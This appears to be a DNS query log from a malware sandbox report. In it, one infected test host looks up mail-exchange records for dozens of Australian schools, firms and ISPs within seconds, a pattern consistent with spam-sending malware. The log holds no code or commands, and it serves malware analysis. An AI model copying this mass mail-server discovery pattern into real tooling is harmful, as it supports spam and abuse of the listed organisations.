                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.532191038 CET8.8.8.8192.168.2.30xaaaNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.532191038 CET8.8.8.8192.168.2.30xaaaNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.532191038 CET8.8.8.8192.168.2.30xaaaNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.532191038 CET8.8.8.8192.168.2.30xaaaNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.532191038 CET8.8.8.8192.168.2.30xaaaNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.532191038 CET8.8.8.8192.168.2.30xaaaNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.532191038 CET8.8.8.8192.168.2.30xaaaNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.578965902 CET8.8.8.8192.168.2.30x366eNo error (0)avivagroup.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.605951071 CET8.8.8.8192.168.2.30x5109No error (0)park-mx.above.com103.224.212.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.740094900 CET8.8.8.8192.168.2.30x9231No error (0)imcc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.766345978 CET8.8.8.8192.168.2.30xa849No error (0)inchcape.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.766345978 CET8.8.8.8192.168.2.30xa849No error (0)inchcape.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.772058964 CET8.8.8.8192.168.2.30x3162No error (0)imcc-wa-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.772058964 CET8.8.8.8192.168.2.30x3162No error (0)imcc-wa-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.817996979 CET8.8.8.8192.168.2.30xe12No error (0)mx07-00031601.pphosted.com91.207.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.873594999 CET8.8.8.8192.168.2.30xde32No error (0)tio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.873594999 CET8.8.8.8192.168.2.30xde32No error (0)tio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.911639929 CET8.8.8.8192.168.2.30x14f5No error (0)cluster5a.us.messagelabs.com52.207.128.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.920809031 CET8.8.8.8192.168.2.30xbe41Name error (3)newyearsparty.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.926284075 CET8.8.8.8192.168.2.30x7dfeNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.926284075 CET8.8.8.8192.168.2.30x7dfeNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.926284075 CET8.8.8.8192.168.2.30x7dfeNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.944364071 CET8.8.8.8192.168.2.30x1c7dNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.944364071 CET8.8.8.8192.168.2.30x1c7dNo error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.944364071 CET8.8.8.8192.168.2.30x1c7dNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.944364071 CET8.8.8.8192.168.2.30x1c7dNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.944364071 CET8.8.8.8192.168.2.30x1c7dNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.944364071 CET8.8.8.8192.168.2.30x1c7dNo error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.944364071 CET8.8.8.8192.168.2.30x1c7dNo error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:35.944364071 CET8.8.8.8192.168.2.30x1c7dNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.011835098 CET8.8.8.8192.168.2.30xe8c1No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.034830093 CET8.8.8.8192.168.2.30xf89aNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.034830093 CET8.8.8.8192.168.2.30xf89aNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.121053934 CET8.8.8.8192.168.2.30x35e3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.121053934 CET8.8.8.8192.168.2.30x35e3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.121053934 CET8.8.8.8192.168.2.30x35e3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.169569969 CET8.8.8.8192.168.2.30x82fcNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.169569969 CET8.8.8.8192.168.2.30x82fcNo error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.169569969 CET8.8.8.8192.168.2.30x82fcNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.169569969 CET8.8.8.8192.168.2.30x82fcNo error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.169569969 CET8.8.8.8192.168.2.30x82fcNo error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.169569969 CET8.8.8.8192.168.2.30x82fcNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.169569969 CET8.8.8.8192.168.2.30x82fcNo error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.169569969 CET8.8.8.8192.168.2.30x82fcNo error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.198492050 CET8.8.8.8192.168.2.30x1f05No error (0)hum.au.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.276612043 CET8.8.8.8192.168.2.30x3b36No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.276612043 CET8.8.8.8192.168.2.30x3b36No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.338412046 CET8.8.8.8192.168.2.30x7c7eNo error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.338412046 CET8.8.8.8192.168.2.30x7c7eNo error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.365781069 CET8.8.8.8192.168.2.30x3185No error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.397886038 CET8.8.8.8192.168.2.30x8fc5No error (0)hum-au-dk.mail.protection.outlook.com104.47.0.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.397886038 CET8.8.8.8192.168.2.30x8fc5No error (0)hum-au-dk.mail.protection.outlook.com104.47.1.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.509852886 CET8.8.8.8192.168.2.30xc9ffNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.601619005 CET8.8.8.8192.168.2.30xfeeaNo error (0)netc.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.624524117 CET8.8.8.8192.168.2.30x24afNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.644607067 CET8.8.8.8192.168.2.30x7680No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.694483042 CET8.8.8.8192.168.2.30x20bbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.694483042 CET8.8.8.8192.168.2.30x20bbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.694483042 CET8.8.8.8192.168.2.30x20bbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.712831020 CET8.8.8.8192.168.2.30x3c40No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.712831020 CET8.8.8.8192.168.2.30x3c40No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.712831020 CET8.8.8.8192.168.2.30x3c40No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.712831020 CET8.8.8.8192.168.2.30x3c40No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.712831020 CET8.8.8.8192.168.2.30x3c40No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.712831020 CET8.8.8.8192.168.2.30x3c40No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.712831020 CET8.8.8.8192.168.2.30x3c40No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.712831020 CET8.8.8.8192.168.2.30x3c40No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.758326054 CET8.8.8.8192.168.2.30xee39No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.758326054 CET8.8.8.8192.168.2.30xee39No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.758326054 CET8.8.8.8192.168.2.30xee39No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.778906107 CET8.8.8.8192.168.2.30x3f32No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.778906107 CET8.8.8.8192.168.2.30x3f32No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.778906107 CET8.8.8.8192.168.2.30x3f32No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.778906107 CET8.8.8.8192.168.2.30x3f32No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.778906107 CET8.8.8.8192.168.2.30x3f32No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.778906107 CET8.8.8.8192.168.2.30x3f32No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.778906107 CET8.8.8.8192.168.2.30x3f32No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.778906107 CET8.8.8.8192.168.2.30x3f32No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.822582006 CET8.8.8.8192.168.2.30x735fNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.822582006 CET8.8.8.8192.168.2.30x735fNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.829857111 CET8.8.8.8192.168.2.30x6845No error (0)meritonsales.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.829857111 CET8.8.8.8192.168.2.30x6845No error (0)meritonsales.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.856074095 CET8.8.8.8192.168.2.30xd430No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.856074095 CET8.8.8.8192.168.2.30xd430No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.860785961 CET8.8.8.8192.168.2.30x7a9bNo error (0)cluster5.us.messagelabs.com67.219.250.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.860785961 CET8.8.8.8192.168.2.30x7a9bNo error (0)cluster5.us.messagelabs.com67.219.247.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.860785961 CET8.8.8.8192.168.2.30x7a9bNo error (0)cluster5.us.messagelabs.com67.219.246.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.860785961 CET8.8.8.8192.168.2.30x7a9bNo error (0)cluster5.us.messagelabs.com67.219.246.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.860785961 CET8.8.8.8192.168.2.30x7a9bNo error (0)cluster5.us.messagelabs.com67.219.250.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.860785961 CET8.8.8.8192.168.2.30x7a9bNo error (0)cluster5.us.messagelabs.com67.219.247.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.876106024 CET8.8.8.8192.168.2.30x45aeNo error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:36.980959892 CET8.8.8.8192.168.2.30xd089No error (0)isikcollege.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.058588982 CET8.8.8.8192.168.2.30x15No error (0)webmail.isikcollege.vic.edu.au203.170.86.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.074898958 CET8.8.8.8192.168.2.30x685aNo error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.105940104 CET8.8.8.8192.168.2.30x39fbNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.105940104 CET8.8.8.8192.168.2.30x39fbNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.204905033 CET8.8.8.8192.168.2.30xfa43No error (0)idx.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.204905033 CET8.8.8.8192.168.2.30xfa43No error (0)idx.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.241167068 CET8.8.8.8192.168.2.30x7b03No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.241167068 CET8.8.8.8192.168.2.30x7b03No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.241167068 CET8.8.8.8192.168.2.30x7b03No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.269377947 CET8.8.8.8192.168.2.30x6cb2No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.269377947 CET8.8.8.8192.168.2.30x6cb2No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.269377947 CET8.8.8.8192.168.2.30x6cb2No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.269377947 CET8.8.8.8192.168.2.30x6cb2No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.269377947 CET8.8.8.8192.168.2.30x6cb2No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.269377947 CET8.8.8.8192.168.2.30x6cb2No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.269377947 CET8.8.8.8192.168.2.30x6cb2No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.269377947 CET8.8.8.8192.168.2.30x6cb2No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.285675049 CET8.8.8.8192.168.2.30xcb17No error (0)banksgroup.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.353231907 CET8.8.8.8192.168.2.30x91e5No error (0)mail.idx.com.au45.56.220.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.455667019 CET8.8.8.8192.168.2.30xe3fNo error (0)banksgroup-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.455667019 CET8.8.8.8192.168.2.30xe3fNo error (0)banksgroup-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.533149004 CET8.8.8.8192.168.2.30x81b0No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.533149004 CET8.8.8.8192.168.2.30x81b0No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.581011057 CET8.8.8.8192.168.2.30x7d63No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.588421106 CET8.8.8.8192.168.2.30x1123No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.588421106 CET8.8.8.8192.168.2.30x1123No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.589077950 CET8.8.8.8192.168.2.30xb4d3No error (0)imcc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.610101938 CET8.8.8.8192.168.2.30x972aNo error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.623146057 CET8.8.8.8192.168.2.30x233bNo error (0)imcc-wa-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.623146057 CET8.8.8.8192.168.2.30x233bNo error (0)imcc-wa-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.656145096 CET8.8.8.8192.168.2.30x3e98No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.656145096 CET8.8.8.8192.168.2.30x3e98No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.656145096 CET8.8.8.8192.168.2.30x3e98No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.694205046 CET8.8.8.8192.168.2.30xc4f7No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.694205046 CET8.8.8.8192.168.2.30xc4f7No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.694205046 CET8.8.8.8192.168.2.30xc4f7No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.694205046 CET8.8.8.8192.168.2.30xc4f7No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.694205046 CET8.8.8.8192.168.2.30xc4f7No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.694205046 CET8.8.8.8192.168.2.30xc4f7No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.694205046 CET8.8.8.8192.168.2.30xc4f7No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.694205046 CET8.8.8.8192.168.2.30xc4f7No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.796459913 CET8.8.8.8192.168.2.30x9752No error (0)usc.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.796459913 CET8.8.8.8192.168.2.30x9752No error (0)usc.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.833884954 CET8.8.8.8192.168.2.30x7cd2No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.833884954 CET8.8.8.8192.168.2.30x7cd2No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.833884954 CET8.8.8.8192.168.2.30x7cd2No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.833884954 CET8.8.8.8192.168.2.30x7cd2No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.853513002 CET8.8.8.8192.168.2.30xd696No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.877099037 CET8.8.8.8192.168.2.30xdd29No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:37.877099037 CET8.8.8.8192.168.2.30xdd29No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.122088909 CET8.8.8.8192.168.2.30xe3dbName error (3)assetbacked.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.141470909 CET8.8.8.8192.168.2.30xc6d5No error (0)marchesepartners.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.180299044 CET8.8.8.8192.168.2.30x2339No error (0)marchesepartners-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.180299044 CET8.8.8.8192.168.2.30x2339No error (0)marchesepartners-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.224292040 CET8.8.8.8192.168.2.30xaef2No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.251475096 CET8.8.8.8192.168.2.30x4263No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.334381104 CET8.8.8.8192.168.2.30xe8faNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.404566050 CET8.8.8.8192.168.2.30x3d4cNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.419801950 CET8.8.8.8192.168.2.30xa3dbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.419801950 CET8.8.8.8192.168.2.30xa3dbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.419801950 CET8.8.8.8192.168.2.30xa3dbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.516100883 CET8.8.8.8192.168.2.30x76d8No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.516100883 CET8.8.8.8192.168.2.30x76d8No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:38.516100883 CET8.8.8.8192.168.2.30x76d8No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
